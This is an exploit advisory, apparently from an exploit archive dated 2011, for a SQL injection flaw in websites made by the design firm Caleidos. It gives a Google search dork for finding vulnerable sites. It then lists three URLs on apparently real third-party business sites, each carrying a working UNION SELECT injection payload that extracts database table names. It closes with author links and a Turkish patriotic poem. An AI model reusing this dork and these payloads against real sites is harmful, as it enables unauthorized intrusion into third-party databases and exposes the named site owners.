# Exploit Title: Caleidos Blind SQL Injection Vulnerability # Google Dork: intext:"WebDesign by www.caleidos.ws" inurl:php?id= # Date: 22.10.2011 # Author: m3rciL3Ss # Service Link: http://www.caleidos.ws/it/web-design.php # Version: # Category: webapps ################################ # Demo site: ===[ SQL ]=== [»] http://www.lemacine-ferrara.it/en/news-dett.php?id=-17+and+1=1+union+select+0,1,2,3,4,5,6,group_concat%28table_name%29,8,9,10,11,12,13,14,15+from+information_schema.tables [»] http://www.siragroup.it/es/sistema-de-calefaccion.php?id=-35+and+1=1+union+select+0,1,2,3,4,5,6,group_concat%28table_name%29+from+information_schema.tables [»] http://www.explorercases.com/news2.php?id_news=-45+and+1=1+union+select+0,1,2,3,4,5,6,7,8,9,group_concat%28table_name%29,11,12+from+information_schema.tables ============================ Note : Number of Column May Vary ################################ m3rciL3Ss.blogspot.com twitter.com/_m3rciL3Ss ################################ Utanıyorum Şehidim, Utanıyorum. Yemekten, İçmekten, Senin Annen Ağlarken, Gülmekten Utanıyorum! Sanma ki; Unutuyor, Unutturuyoruz. Unutanları Barındırmaktan Utanıyorum. Sen; Vatan İçin Bizim İçin Şehit Olurken, Seni Görmezden Gelenlerden Utanıyorum... Aziz Nesin ALLAH Tüm ŞEHİTLERİMİZİN Mekanını Cennet Eylesin AİLELERİNE Sonsuz Sabır Versin ################################